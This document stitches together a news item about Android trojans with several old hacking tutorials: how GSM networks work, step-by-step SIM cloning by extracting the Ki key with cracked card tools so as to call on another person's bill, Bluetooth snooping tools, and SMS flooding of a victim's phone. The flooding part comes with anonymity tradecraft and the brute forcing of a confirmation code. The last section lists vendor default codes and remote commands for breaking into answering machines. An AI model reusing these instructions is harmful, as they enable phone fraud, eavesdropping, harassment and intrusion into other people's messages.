Security Researchers of University of California created an Android app called TouchLogger that can match the phone’s vibration every time you press a key and that will be recorded.
They claimed that it is having 70% accuracy rate. TouchLogger works as a keylogger that never has to actually record the keystrokes you make on your Android device. It only needs you to give it permission to use the motion sensors, which should make it sound relatively safe.
Some copies of one version (Beta 0.981) of the game Dog Wars is also infected with the “Dogbite” trojan that sends a text message to everyone in your contact list that says “I take pleasure in hurting small animals, just thought you should know that.”
It also tries to sign the user up for text alerts from People for the Ethical Treatment of animals.
That makes the malware sound like a political stunt from PETA aimed at people committing virtual violence on dogs (though any punishment should be for anyone playing “Dog Wars” without knowing absolutely that dogs are incapable of large-scale violence simply because there would never be enough of them willing to stop eating, sleeping, sniffing each other or chasing things that looked like they moved, but didn’t to get any kind of real combat going).
Malware writers are going out of their way to make political points using malware, though, according to Symantec.
One version of the paid edition of the Walk and Text app – which activates the camera on the back side of the phone so you can see on the screen where you’re going while you thumb-type with your head down – sends a message out to all your contacts saying you download software illegally from unauthorized sites.
Symantec researchers don’t think PETA or any other animal-rights group had anything to do with the Dog Wars trojan (or the Walk and Text, for that matter).
“In spite of the fact that few clues have been left behind, we have no reason to believe that PETA had anything to do with this app, and that it is most likely the work of someone attempting to associate the app with PETA or to gain sympathy by the association,” the report said.
Some did suggest there may be more attempts at influencing political or social-issue thinking by using infected mobile devices to send targeted messages and embarrass their owners.
Malware writers aren’t famous for sharing common political stances, despite the apparently pro-PETA hack.
If there’s one thing malware writers care about, it’s getting paid. Since that was the gist of the Walk and Text malware trick – embarrassing people who download software without paying for it – we may see more of that from commercial app developers and the Business Software Alliance as well.
The BSA has a lot of lobbying positions, but getting paid as much as possible for their software is the one closest to whatever it uses for a heart.
Section 1: The Introduction
Originally developed as a European standard for mobile telephony, GSM has quickly gained grounds all over the world. However, for much of the world this is still new technology, and therefore there are many people with many questions to ask. One of the ones I most commonly hear from time to time when I idle in Hackers’ Lounge is “how do you hack gsm phones?”. This is understandable. For much of the world this is still new technology, and there are a lot of people who want to know about all the fun things they can do with these new phones. Well, this tutorial is for all of you. A complete guide for all your gsm hacking needs. Enjoy…
Section 2: How GSM Operates
As I’ve said in past tutorials, in order to hack anything in any sense of the word you have to first understand how it operates. Therefore in this section you will learn the details on GSM to have a better understanding of how it operates. Therefore, you will have a better understanding of how it can be exploited. GSM (Global System for Mobile communication) is fundamentally different from some of it’s older counterparts like AMP in the sense that it operates using digital technology, instead of using the traditional analog technology.
GSM being a cellular system is of course divided into cells. These cells correspond to their covering area of one trasmitter, or a small collection of transmitters. The size of these cells depend on the power of their transmitter. GSM, as with other cellular systems, uses low power transmitters so that frequencies can be reused efficiently. The frequency band used by a cellular mobile radio system is distributed over a group of cells, which is repeated in all the covering area of an operator. All the radio channels that are available can then be used in each group of cells that form the covering area of an operator. The frequencies that are used then will be reused several cells away. There are four different types of cells that are used. Macrocells, microcells, selective cells, and umbrella cells. Macrocells are large cells that are used for remote and sparsely populated areas. Microcells on the other hand are used for densely populated areas. With using these types of cells in densely populated areas, the number of channels available is increased as well as the capacity of the cells. Transmitters under these types of cells use less power in order to reduce the possibility of interference between neighboring calls. In areas where a full 360 degrees of coverage is not needed, selective cells are used to specify a certain area of coverage. Umbrella cells are used in correlation with microcells in order to solve the issue with handovers when traversing through microcell areas. The power levels within an umbrella cell is increased compared to the power levels within the microcells that the umbrella cell covers. The cells themselves are grouped into clusters. The number of cells used within a cluster is determined so that the cluster can be repeated continuously within the covering area of an operator.
Your typical cluster usually contains either 4, 7, 12, or 21 cells. The number of cells used within a cluster is very important. The smaller the number of cells per cluster is, the bigger the number of channels per cell will be, which will therefore increase the capacity of each cell. The total number of channels used in each cell depends on the number of available channels and the type of cluster used. A balance must be established when setting up these clusters in order to avoid interference with neighboring clusters. Now lets discuss the architecture of the GSM network.
A GSM network can be divided into four main parts. The MS (Mobile Station), the BSS (Base Station Subsystem), the NSS (Network and Switching Subsystem), and the OSS (Operation and Support Subsystem). The two main elements of an MS is the terminal, and the SIM (Subscriber Identity Module). There are different types of terminals within the MS architecture that are distinguished based on their power and application. The fixed terminals are the ones installed in cars, and have a maximum output of 20 watts. The GSM portable terminals can also be installed in cars, and have a maximum output of 8 watts. Then finally handheld terminals, which has a maximum output of 2 watts, but nowadays these terminals can and do transmit at 0.8 watts. The SIM is a smart card that is used for identifying the terminal. This SIM card is protected by a PIN (Personal Idenfitication Number), and in order to identify the user to the system also includes other parameters of the user such as it’s IMSI (International Mobile Subscriber Identity). This is what allows the terminal to operate within the GSM network. Without the SIM card, the terminal itself is a useless device. The BSS is in charge of transmission and reception, and is what connects the MS and the NSS. There are two parts that make up the BSS; the BTS (Base Transceiver Station, also known as a Base Station), and the BSC (Base Station Controller). The BTS corresponds with the tranceivers and antennas used in each cell within the network, and are usually located in the center of the cell. The transmission power of the BTS is what defines the size of it’s cell. Each BTS has between 1 and 16 transceivers, depending on the density of users within the cell. The BSC is what manages the BTSs, and is primarily in charge of handovers, frequency hopping, exchange functions, and is in charge of the radio frequency powers levels of the BTSs. The NSS is in charge of managing the communications between the mobile users, and other users. This part of the GSM architecture is separated into 7 parts. The MSC (Mobile services Switching Center), the GMSC (Gateway Mobile services Switching Center), the HLR (Home Location Register), the VLR (Visitor Location Register), the AuC (Authentication Center), the EIR (Equipment Identity Register), and the GIWU (GSM Interworking Unit). The center component of the NSS is the MSC, which performs the switching functions of the network, as well as provides connectivity to other networks. Next is the GMSC, which is provided as the interface between the cellular network and the PSTN (Public Switched Telephone Network). This is in charge of routing calls from the fixed network to a GSM user, and this is usually implemented in the same machine as the MSC. The HLR is in charge of storing information of the subscribers belonging to the covering area of the MSC, as well as stores the current location of these subscribers and the services that they have access to. The location of the subscriber corresponds to the ss7 (short for Common Channel Signaling System 7, the protocol used by modern PSTNs) address of the VLR. The VLR is in charge of storing information from a subscriber’s HLR that is necessary in order to provide the subscribed services to visiting users. This information is recorded into the VLR upon request from the HLR after a subscriber enters the covering area of an MSC. That way the VLR can assure subscribed services to the user without having to call upon the HLR every time a connection is established. The AuC is a security feature within the NSS. It provides the parameters needed for authentication and encryption functions within the GSM network, which helps to verify the user’s identity. The EIR as well is also used for security purposes. The EIR contains information about the mobile equipments; more particularly, a list of all valid terminals within the covering area of an MSC. A terminal is identified with it’s IMEI, and the EIR is used to forbid calls from stolen or unauthorized terminals. The GIWU is made up of both hardware and software that provides an interface to various networks for data communication. Using the GIWU, speech and data can be alternated during the same call. Finally the OSS is interconnected to different components of the NSS and to the BSC in order to monitor and control the GSM system, as well as controlling the traffic load of the BSS.
Now that we understand the structure of a GSM network, lets dive further into the functions within the GSM system. There are five different defined functions within the GSM system. Transmission, RR (Radio Resources management), MM (Mobility Management), CM (Communication Management), and OAM (Operation, Administration and Maintenance). The first function we shall discuss is of course the transmission function, which actually in itself contains two subfunctions. The first subfunction deals with the means needed for the transmission of user information, while the second subfunction deals witht he means needed for the transmission of signaling information. Contrary to what one may believe on first glance, not all functions within the GSM network are strongly related to the transmission function. The MS, BTS, and BSC are of course very strongly related to transmission. However, other aspects of the GSM network such as the HLR, VLR, and EIR only deal with transmission for signaling purposes with other components of the GSM network. Now lets take a minute to talk about the more important aspects of the transmission function. One of the main objectives of GSM is roaming. So in order to obtain a complete compatibility between mobile stations and networks of different manufacturers and operators, the radio interface must be completely defined. This specification of the radio interface is a very important influence on the spectrum efficiency.
First there is frequency allocation, which allocates two frequency bands for the GSM system. The frequency band 890-915 Mhz has been allocated for the uplink direction (transmitting from the mobile station to the base station), and the frequency band 935-960 Mhz has been allocated for the downlink direction (transmitting from the base station to the mobile station). However, what you must understand about frequency allocation is that not all frequencies within the frequency bands specified can be used by all countries, due to military reasons and that existing analog systems use part of the two 25 MHz frequency bands. Then there is the multiple access scheme, which defines how different simultaneous communications, between different mobile stations situated in different cells, share the GSM radio spectrum. The multiple access scheme adopted by GSM is actually a mixture of FDMA (Frequency Division Multiple Access) and TDMA (Time Division Multiple Access) with the addition of frequency hopping. FDMA operates by assigning a frequency to a specific user, while TDMA allows several users to share the same channel. It does this by assigning each user their own burst within a frame (a group of bursts). Under GSM, TDMA operates within a FDMA structure. It accomplishes this by dividing a 25 MHz frequency band into 124 carrier frequencies spaced from each other by a 200 khz frequency band. The first carrier frequency is used as a guard band between GSM and other functions, which operate on lower frequencies. Each of these carrier frequencies are then divided in time using a TDMA scheme, which splits the radio channel, with a width of 200 khz, into 8 bursts. Each of these eight bursts are then assigned to a single user. Now a channel corresponds to the recurrence of one burst every frame. This is defined by its frequency and the position of its corresponding burst within a TDMA frame.
Within GSM, there are two types of channels, traffic channels and control channels. Traffic channels are used to transport speech and data information. TCH/Fs (full rate traffic channels) are defined using a group of 26 TDMA frames referred to as a 26-multiframe. Using the 26-multiframe structure, uplink and downlink traffic channels are separated by 3 bursts. The structure for the 26-multiframe is as follows; 24 frames are reserved for traffic, 1 frame is used for the SACCH (Slow Associated Control Channel), and the last frame is unused to allow the mobile station to perform other functions like measuring signal strength of neighboring cells. There are also TCH/Hs (half rate traffic channels) which also are grouped in a 26-multiframe, but the internal structure is a bit different. Control channels are used for network management and some channel maintenance tasks. There are four different types of control channels defined by the task they perform. BCH channels (Broadcast Channels), CCCH channels (Common Control Channels), DCCH channels (Dedicated Control Channels), and associated control channels. BCH channels are used by the base station to provide the mobile station with sufficient information needed to synchronize with the network. There are 3 different types of BCH channels; BCCH (Broadcast Control Channel) channels, SCH (Synchronization Channel) channels, and FCCH (Frequency-Correction Channel) channels. The BCCH channel gives the mobile station the parameters necessary in order to identify and access the network. The SCH channel gives the mobile station the training sequence needed in order to demodulate the information sent by the base station. Finally the FCCH gives the mobile station the frequency reference of the system in order to synchronize with the network. The CCCH channels are used to establish the calls from the mobile station or the network. Once again, there are three different types of CCCH channels. The PCH (Paging Channel) channel, the RACH (Random Access Channel) channel, and the AGCH (Access Grant Channel) channel. The PCH channel is used to alert the mobile station of an incoming call. The RACH channel is used by the mobile station to request access to the network. Then the AGCH channel is used by the base station to inform the mobile station about which channel it should use, which is the answer of a base station to a RACH from the mobile station. The DCCH channels are used for message exchange between several mobiles and the network. There are two different types of DCCH that can be defined; the SDCCH (Standalone Dedicated Control Channel), and the SACCH (Slow Associated Control Channel). The SDCCH is used in order to exchange signaling information in the downlink and uplink directions, and the SACCH is used for channel maintenance and control.
Then finally there is the associated control channel, which composes of the FACCH (Fast Associated Control Channels). The FACCH replaces all or part of a traffic channel when urgent signaling information must be sent. These types of channels carry the same information as the SDCCH channels. So now that we (hopefully) understand how FDMA and TDMA operate under GSM, we can now explore into the third part of the multiple access scheme, frequency hopping. There are two types of frequency hopping. The slow frequency hopping changes the frequency with every TDMA frame, which is used to avoid important differences in the quality of the channels. On the other hand, fast frequency hopping changes the frequency many times per frame. Fast frequency hopping however is not used within GSM, so it is not really important to us. However, in order for frequency hopping to even be used across the network, it has to be approved by the mobile station. Now lets get into speech coding. Speech coding is the most important aspect of a cellular mobile service, so a lot of attention is given into detail. The codec used by this service first and foremost is a codec called RPE-LTP (Regular Pulse Excitation Long-Term Prediction), which uses the information from previous samples in order to predict the current sample. The speech signal itself is divided into blocks of 20 ms. The size of these blocks are of 260 bits. These blocks once divided are then passed to the speech codec, which has a rate of 13 kbps. Next is channel coding, which adds redundancy bits to the original information in order to detect and correct (if possible) the errors occured during transmission. Channel coding uses two codes; a block code and a convolutional code. The block code receives an input block of 240 bits and appends four 0 tail bits at the end of the input block, thus making the block 244 bits. The convolutional code adds redundancy bits in order to protect the information. What makes convolutional code and block code different is the convolutional encoder contains memory. A convolutional code can be defined by 3 variables; n, k, and K. For the sake of your sanity and mine, I will skip over explaining this. If you feel curious enough to read into this, then you can do a google search and find more information on this in your spare time.
Interleaving is another function that rearranges a group of bits in a particular way. Within GSM it is used in combination with FEC codes in order to improve the performance of the error correction mechanisms. Again, I’m going to let you look into the details on this function in your own time. There is also burst assembling, which is in charge of grouping the bits into bursts. Then there is ciphering, which might be a topic that may wake a few of you readers up. Ciphering is of course used to protect signaling and user data. This cipher works by computing a ciphering key using the A8 algorithm stored in the SIM card, the subscriber key, and the random number delivered by the network (the same one used in the authentication procedure). Then a 114 bit sequence is produced using the ciphering key, the A5 algorithm and the burst numbers. This bit sequence is then XORed with the two 57 bit blocks of data included in a normal burst. In order to decipher all this correctly, the receiver of the transmission has to use to the same A5 algorithm for the deciphering procedure.
Finally for those of you who may want to know, the modulation used with GSM is the GMSK (Gaussian Minimum Shift Keying), which has a rate of 270 5/6 kbauds and a BT product equal to 0.3. There are a few other functions, but I didn’t feel that they were necessary for this tutorial so I didn’t include them. Now that we’re done talking about the transmission function, feel free to take a break real quick to rest your eyes and let your brain process all this in. Smoke a cigarette, eat some junk food, just do whatever you need to do to relax and let all this information I’ve given you sink in. Finished? All right, let’s continue. Now that we are done talking about transmission, the next function we shall discuss is radio resources management. RR is used to establish, maintain, and release communication links between mobile stations and the MSC. The main elements of the RR deal with the base station and the mobile station, but since the MSC needs to deal with handovers, then it also concerned with RR functions. The main procedures involved with RR is channel assignment, change, and release; handovers; frequency hopping; power-level control; discontinuous transmission and reception; and timing advance. However, since we’ve already gone over most of these functions when talking about transmission, then the only one we really need to concentrate at this point is handovers. Handovers are of course the process of changing the channel or cell that a user is on when they are moving. There are four different types of handovers that are used in these instances. The handover of channels within the same cell, the handover of cells controlled by the same BSC, the handover of cells belonging to the same MSC but controlled by different BSCs, and finally the handover of cells controlled by different MSCs. The first two types of handovers are managed by the BSC, while the MSC is only notified of these handovers. Meanwhile the MSC is in charge of managing the last two mentioned handovers. In order for this handover to work, the mobile station controls its own signal strength and the signal strength of the neighboring cells. These power measurements allow the MSC or BSC to decide which cell is best to use in order to maintain the quality of the communication link. There are two different types of handover algorithms that are used, the ‘minimum acceptable performance’ algorithm, and the ‘power budget’ algorithm. The ‘minimum acceptable performance’ algorithm works by increasing the power level of the mobile when the quality of the transmission is decreased until this increase has no effect on the quality of the signal, which is then when a handover is performed. On the other hand, the ‘power budget’ algorithm just goes ahead and makes the handover instead of increasing the power level in order to obtain a good communication quality. Well as I said the rest of the RR functions were already discussed when we were talking about transmission, so now lets get into mobility management.
MM is in charge of all aspects related with the mobility of a user, specifically the location management and the authentication and security. Location management is performed by performing an update location procedure by indicating it’s IMSI to the network when the mobile station is powered on. When a mobile station moves to a different location area or a different PLMN, the location update message is sent to the new MSC/VLR, which then gives this location information to the subscriber’s HLR. If this step is authenticated, the HLR cancels the registration of the mobile station with the old MSC/VLR. This location updating is performed periodically, and if after the updating time period the mobile station hasn’t registered, then it’s deregistered. When a mobile station is powered off, it sends an IMSI detach procedure in order to let the network know that it’s no longer connected. Now the authentication procedure is involved with the SIM card and the Authentication Center. A secret key that is stored within the SIM card and the AuC, and the A3 ciphering algorithm mentioned earlier is used to verify the authenticity of the user. The mobile station and the AuC creates an SRES using the secret key, the A3 algorithm, and a random number generated by the AuC. If these two SRESs are the same, then the user is authenticated. Also the AuC checks the equipment identity to see if the IMEI number of the mobile is authorized to the EIR, which if so, the mobile station is allowed access to the network. During the authentication procedure the subscribed services for the user is also checked. Also in order to assure user confidentiality, the user is registered with a TMSI (Temporary Mobile Subscriber Identity) after it’s first location update procedure. Now lets talk about communication management.
CM is responsible for three different functions within the GSM system. Call control, supplementary services management, and short message services management. Call control is in charge of call establishing, maintaining, and releasing as well as selecting the type of service. One of the most important roles of CC is call routing. In order for a user to reach a mobile subscriber, a user dials the MSISDN (Mobile Subscriber Integrated Services Digital Network) which includes a country code, a national destination code identifying the subscriber’s operator, and a code corresponding to the subscriber’s HLR. This call is then passed to the GMSC (if the call indeed is originated from a fixed network), which knows the HLR corresponding to a certain MSISDN number. The GMSC then asks the HLR for information needed in call routing, the HLR requests this information from the subscriber’s VLR, and this VLR allocates an MSRN (Mobile Station Roaming NUmber) temporarily for the call. This MSRN number is then sent through the HLR to the GMSC, which allows for the call to be routed to the subscriber’s current MSC/VLR, and thus the mobile is paged. Now lets talk about the supplementary services management function. This function deals with only the mobile station and the HLR, and is what provides selected services to the subscriber.
One function within supplementary services management is call forwarding, which allows a user to forward incoming calls to another number if the mobile is busy. This function call also be applied unconditionally. Another service is call barring. There are many different types of call barring services. BAOC (Barring All Outgoing Calls), BOIC (Barring Outgoing International Calls), BOIC-exHC (Barring Outgoing International Calls except those directed towards the Home PLMN Country), BAIC (Barring All Incoming Calls), and barring all incoming calls when roaming. Then of course there are other services like call hold, call waiting, multiparty service, CLIP (Calling Line Identification Presentation), CLIR (Calling Line Identification Restriction), and other services. I would go into them all, but I want to go ahead and finish up this section so I can continue with the rest of the tutorial.
Now short message services management of course in charge of managing the sms service. This service is supported via a Short Message Service Center through two interfaces. One is SMS-MT/PP (the SMS-GMSC for Mobile Terminating Short Messages), and SMS-MO/PP (the SMS-IWMSC for Mobile Originating Short Messages). It’s good to note that SMS-MT/PP plays the same role as GMSC. Now onto OAM (Operation, Administration, and Maintenance). OAM is used to allow the operator to monitor and control the gsm system as well as modify the configuration of the properties and elements of the gsm system. OSS, BSS, and NSS all play a part in OAM’s operation. Certain components of BSS and NSS provide the information needed by the operator, which is then passed to the OSS, which is in charge of analyzing it and controlling the network. The self test tasks usually carried out by the BSS and NSS are also used by the OAM for certain functions. The BSC, which is in charge of controlling several BTSs is also a part of OAM.
Well that concludes it for the functions within the GSM system and for this section. If you have ended this section utterly confused then feel free to read it over. It’s not that you need to remember every single component and fact listed in this section, but it helps to have a pretty good understanding of the gsm system, and it’s better that the information is here for you to recall on. Just be sure that you have a basic understanding of the information I have provided you before you continue to the next section.
Section 3: Exploiting GSM Phones
So now that you hopefully have at least a basic understanding of how gsm operates, let’s talk about the fun stuff. The first trick I will discuss is an activity that is becoming quite prevalent, SIM cloning. If you have paid attention to any cell phone related tutorials in the past, then you may remember cloning being made popular by certain public figures like Kevin Mitnick in order to place calls on the bill of another subscriber. Well, even with GSM this trick still holds relevant. How could such a flaw exist in a system that is obviously concentrated on preventing such fraudulent use? The flaw is within the COMP128 authentication algorithm used as an instantiation of A3/A8 widely used by gsm providers. Unfortunately for these providers, the COMP128 algorithm is just not strong enough to prevent fraud. We attack the algorithm by using a chosen-challenge attack, which works by forming a number of specially-chosen challenges and querying the SIM card for each one. Then by analyzing the responses from these queries, we are able to determine the value of the secret key that is used for authentication. So how do we perform this attack? Well there are a few things you need before you start. First you will need to buy a SIM card reader, a card programmer, empty silver pic 2 card, and an unregulated adapter, and if you don’t have one a 9 pin male to female extension cable. You can probably put a bid on ebay for most of this hardware, or just google up some sites that sell them. You will also need some software for this trick. First you will need a SIM card editor. An excellent piece of software to use in this instance is Cardinal Sim Editor, which you can find (including the crack for it) at the below link…
Another tool you will use is CardMaster, which once again you can find at the below link…
Finally what you will need is a SIM card emulator. An excellent example of an emulator to use is SIMEMU, which you can find at the below link…
Note for those of you who feel the need to read the instructions on the site, just go to http://www.freetranslation.com to translate the web page from Spanish to English. Now let’s go ahead and get started shall we. You will first want to plug your SIM Reader into your com port. Then run Cardinal and then click where it says “Click Here” and then click Settings. You will then select your com/serial port and the baud rate. Then you will close this out, and then left click where it says “Click Here”, go to smartcard, and click SIM editor. The program will from there start up, and you will go to SIM, then SIM Info, and click the load button. After doing this you will see the IMSI code, take note of this code as you will need it. Now close the SIM Info and go to Security/Find key KI. When this window opens just click Start and wait. It will take approximately 4 hours to find the key. Once it is found take note of this KI and exit. Now you should have the IMSI and KI noted, if so lets continue with the next step. Now take your silver card. Within the unzipped file within you will find two files. SEE50s.hex (EEPROM) and SEF50sEN.hex (PIC). Now connect your programmer to a com port and go to the setup menu on your CardMaster program and choose the appropriate com port. You should then see a yellow rectangle at the bottom of the program that says that there is no card. Now insert your smartcard into the programmer, and the rectangle should change to green and you will see “Card ready”. Now go to where it says “Card type:” and select “Silvercard”. NOw go to the “File to Pic:” field and upload SEF50sEN.hex, then go to the “File to Eeprom:” field and upload SEE50s.hex. Now go to Edit and click “Auto Program”. Now once this is finished you will need to cut the card so that it will fit into the phone. Instructions for how the card needs to be cut is provided on the GSM solutions web site that will be listed in the Sites to Visit section at the bottom of this page.
Now insert the newly cut silvercard into the phone. If it asks for a pin just punch in 111. Then from the main menu open up “Sim-Emu”. Now from this menu go to Set Phone #, then -GSM #1 (or any slot), then Configure, then Edit #. Now edit GSM #X to any name, and then press ok. Now go to Config.Pos. and it will ask for PIN2, which will be 1234. It will then ask you what position you want the card to be, choose Position 1. It will then ask you for the IMSI, which you will punch in the IMSI you got from Cardinal. It will then ask you for the KI, which again you punch in the KI you got from Cardinal. It will then ask you to enter your PUK which can be anything up to 8 digits. Then it will ask you to enter your PIN which can be anything up to 4 digits.
There you go, now you have cloned another SIM card, and are now free to call away all you want to on someone elses bill. There have also been rumors that on certain services there are ways to clone a SIM remotely, but none have been tested so this can’t be proven. So now that we’re finished talking about SIM cloning, let’s get into another trick involving exploiting gsm phones, bluejacking.
What is bluejacking you ask? Bluejacking is exploiting the BlueTooth wireless communication system common among PDAs, cell phones, and of course laptops. In essence this is nothing more than a harmless little prank, similar to defacing web sites. For bluejacking gsm phones what we are trying to do is first create a phonebook contact that says something like “haha I haxor3d j00r ph0n3!”, and then send it to any bluetooth enabled device in the vicinity. This in essence amounts up to at most a harmless little prank, but it’s fun to watch their faces when they get the message. However, I won’t bother explaining the details of how to bluejack, since the methods are models and manufacturer dependent, and are explained on a site that will be listed at the bottom of this tutorial.
Don’t believe that the possibilities for exploiting bluetooth enabled gsm phones ends there though. Another activity that we can jump onto is called bluebugging. Bluebugging is the process of sniffing out communication from a bluetooth-enabled cell phone. Like, for example, sms messages. Yup, now you can sit in a coffee shop, open up your laptop, and spy on everyone else who is using their phone. This concept was first introduced to the world in a presentation at DefCon 11, and is now available to the public in the form of a tool called BlueSniff that works as a bluetooth wardriving utility to play big brother. Go to the below address to get a copy of this tool…
Another nice tool to use for such means is btscanner, which can be used to gather as much information as possible on a bluetooth-enabled device. Yet again, this wonderful tool can be found at the below address…
There is also a method known as bluesnarfing, which can be used to gain access into a cell phone to steal files. However, contrary to the media hype surrounding this issue, bluesnarfing tools are NOT freely available for all to take (at least none that I know of). The only known tool to exploit this weakness is Bluesnarf, which is not freely available for download. However, don’t let that get you down, since as you can see there are many more bluetooth flaws that we are able to take advantage of. Well that concludes it for this section. As always, hope you all have enjoyed reading this tutorial as much as I enjoyed writing it. So until next time…
Section 4: Sites to Visit
http://www.gsmsolutionsltd.com – GSM Solutions ltd. – full information on SIM cloning including how to properly cut the silvercards
http://www.bluejackq.com – a site dedicated to bluejacking
http://www.geocities.com/henrik.kaare.poulsen/gsm.html – a complete guide to how gsm operates
Note: For those of you who have any questions or comments and feel the need to reach me then you can do so at firstname.lastname@example.org and I will try to get back to you as soon as possible.
This was a topic I wasn’t going to cover, being that I think it to be a potentially serious problem (an opinion shared by several people I have discussed it with) however by the time I release this tutorial I have taken every possible step toward alerting the pertinent authorities to this vulnerability and its potential effects. This being said lets continue.
As many of you know, most people with a cell phone have a plan that includes SMS / text messaging. It is possible to send a phone a message via email providing that you know the target phones full 10-digit phone number and their provider. You send an email to the number at the particular providers predetermined address and Voila! The phone gets the message. If you were to send several messages, the phone would receive these as well, and this is where we come into the potential for attack.
Obviously this service being not only free, but also incredibly easy to perform constitutes and even welcomes the potential for abuse. This article will cover how to create such an attack locally (one target) and also discuss the theoretical implications of a wide area attack.
Obviously anonymity is the key.
As you may or may not know there are several ways to send an email anonymously and many programs are available that already have the feature or can be modified to preform this function automatically. By sending the targets phone either a predetermined or even an endless loop of emails, they will receive that same number of text messages. How quickly this attack is initiated seems to be dependent on the provider/service and method used in the attack.
There are many ways to stage an attack, yet the principal is the same.
Create an email account that does not require confirmation for forwarding of messages. I will use Gmail as a working example for the time being. Be sure to create and access this account as anonymously as possible utilizing proxies, war driving combined/w MAC spoofing, public terminals/w attention to cameras, sign-ins and terminal seating placement/arrangement, as well as any other measures you may take to protect your identity. Ideally a combination of methods should be used. Once the account is created, simply set it up to receive as many emails as possible. This can be accomplished by signing up to various daily mailings, alerts, groups, etc. Be creative. Once you are happy with the amount of traffic being generated simply forward the account to the target.
Settings > Forwarding and POP > Forward a copy of incoming mail to >
Obviously enter the targets address in the field provided.
This methods effectiveness is dependent solely on the amount of traffic you can generate in the mail accts inbox and the speed in which it is done.
Create a yahoo account. Again, be sure to create and access this account as anonymously as possible as I previously mentioned. When setting up this account, be sure to add the targets email address as the secondary email address. Log in and go to alerts.yahoo.com or the alerts setup page. At this point your goal is to activate as many alerts as possible to the account so use the alerts you think will yield the most traffic. I have found keyword auction alerts to be particularly effective when using keywords like “of”, “an”, “be”, “ship”, “my” etc. Be sure to set these alerts to “Immediate Delivery” for maximum effect. I would think that 15 to 20 common keywords ought to constitute a significant attack.
Using telnet or another similar means to send an anonymous email is also a possibility however this methods effectiveness hasn’t been as good as the other methods I’ve covered so far. This may have something to do with the SMTP servers I’ve been using in my proof of concept testing so I’m going to cover my ass and say that results will vary. Its very simple to do, and automation of this process is also relatively standard though for general security and convenience reasons I wont be posting code or where to get code for an anonymous mail bomber but I should however comment that there are many existing programs out there that can either be modified or utilized in a particular way as to make them anonymous. (Update – When using reliable SMTP servers, this method is just as effective as the others mentioned.)
Many chat clients offer the option of forwarding IM/PMs to a mobile device. (AIM for example has no confirmation at all… just pop in the number and flood away) Some chat clients however require a confirmation from the cell phone user to activate. While this would seem to be a secure way to ensure that no abuse of the system or attacks as we are speaking about takes place, we seem to have a general lapse in security. Let me explain.
Using yahoo messenger as an example, when setting up the account to forward all messages to a mobile device it requires you know the provider/service of the phone number and also sends the phone a 5-digit numerical confirmation number. This number must be entered into the form for the changes to take place. However, for some strange reason there is no brute forcing protection on this entry field so its only matter of running through 5 numerical characters… a feat that would take a program/w the proper dictionary file no time at whatsoever. In any case, once the confirmation number has been entered, it is simply a matter of sending as many IM/PMs to that ID as possible, and again there are many existing programs out there that can be modified to be used anonymously and effectively or already are and if nothing else are easy enough to create.
Enough methods. If you’ve read any of my other articles you know that there’s more than one way to do any and everything. I’m sure you can use these examples to perform your own proof of concept tests and will come up with a few other methods I didn’t mention or perhaps never thought of. Now let’s move on and discuss the implications of applying this attack to broader targets.
If you live in the North Eastern US (possibly other locations as well) and were trying to use your cell phone during the terrible attacks of 9-11 you may have noticed that the network was busy, and the phones didn’t work the whole time, if at all. This was due to the unusually large volume of calls going out at once which the towers weren’t ready to handle. The towers were flooded, and therefore basically experienced a DDOS attack through legitimate traffic. The same principal would apply theoretically if one were to uses this SMS attack method on a wide scale, say every number in a particular area code and across a variety of providers. (Obviously this is all speculation because I don’t see the point of potentially shutting down cellular service in an area just for a proof of concept.) In any case lets say one were to launch an attack on a scale of that size or larger (several or all area codes in an area ranging from a few towns to the continental United States) of 750,000 messages. This would result in one of the following:
1. Every phone with txt/sms messaging service will receive 750,000 messages.
2. The local cellular towers become overwhelmed by the traffic and emulate a DDOS attack.
The least destructive possibility is that the person initiating the attack would overwhelm the cellular provider’s servers and cause them to fail. Also, obviously if one were to make a list of every possible number in a particular range not all of them will be valid phone numbers and will bounce back with “delivery not sent” messages. Removing potential invalid numbers from the list would prove tedious if not maddening. If one were to use a mail server that allowed forwarding without confirmation to do this (for example Gmail) this person could use this forwarding flaw to their advantage and initiate a completely separate simultaneous attack using the hundreds of thousands of bounce backs to flood another mail server, particular account, etc.
Some interesting bonus info on these types of attacks includes the following:
1. The target may not be able to make any calls while the flooding is taking place
2. The target may be forced to delete each message manually depending on the type of phone they have.
3. The target is charged for every message received over their plan limit, and in some cases when initiated from email it is considered data not txt/sms so there is a completely different (and usually higher) billing rate.
As you can see, these types of attacks can be incredibly destructive and at the least incredibly annoying. If no change is made to the system I foresee these types of attacks becoming more common, especially due to their simplicity.
by Murder Mouse
Section 1: The Introduction
Many years ago I remember reading a tutorial called “Hacking Answering Machines”. This tutorial was apparently written back in 1989, when answering machines were just blossuming into the market. This was back during the days of cassette-recorder answering machines. The tutorial spoke of different vendors and models that used for the most part 2-digit passwords for remote access. It is now the year 2005, and for the most part cassette-recorder answering machines are a thing of the past, replaced by digital answering machines. Surely they’ve beefed up security since then, right? Wrong. The truth is though most answering machines are now digital, and many new features have been added to them since then, the password scheme is still pretty much the same. That is where this tutorial comes into play. To show you, the reader, how to gain access into these newer digital answering machines using the same techniques that were used 15 years ago (yeah, I know, sad isn’t it?). So without further crap….
Section 2: Gaining Access
The easiest way to gain access into an answering machine is to use it’s preset access code. This is the access code set at default by the vendor on the given device. The best thing about this is that most users don’t bother to change the access code to their device, if they even know that they have such a feature. Even worse yet, some of the manuals given for the device by it’s vendor even tells the user that changing the access code is optional, not necessary. So of course since most people only do what they feel is necessary, these access codes are many times if not usually set at default. So what I’m going to do for you now is list the different popular vendors out there, and include their preset access codes, how to use them, and controls to use after gaining access. Keep in mind that if there is no model number beside the vendor, then that means that the information given works on most of their models. Likewise of course if there is a model identification beside the vendor name (placed in parenthesis) then that of course means that the information provided is model dependant. So let’s begin, shall we?
1) AT&T – preset access code is 10 – when the answering machine picks up punch in the access code
7 – play messages
6 – play new messages
# – stop/pause
2 – repeat message
5 – skip message
4* – record announcement (push # to end recording)
41 – play announcement
* – record memo
33 – delete all messages
3 – delete selected
0 – turn system on
88 – turn system off
99 – change remote code
2) BellSouth – preset access code is 555, Mailbox 1: 555, 2: 666, 3: 777, 4: 888 – when the machine picks up hit * and then punch in the access code
0 – help (use this to get the commands available)
3) Freestyle – preset access code is 000 – when the machine picks up push in the D button and then punch in the access code
2 – play all messages
3 – play new messages
4 – skip back during messages
5 – delete during messages
6 – skip forward during messages
8 – play outgoing message
9 – record new outgoing message
0 – set answering machine on/off
1 – hear main menu
4) Vtech (VT650) – preset access code is 0000 – enter access code during announcement
#4 – repeat message
#5 – pause message
#6 – skip to next message
#7 – delete message
#8 – skip backwards
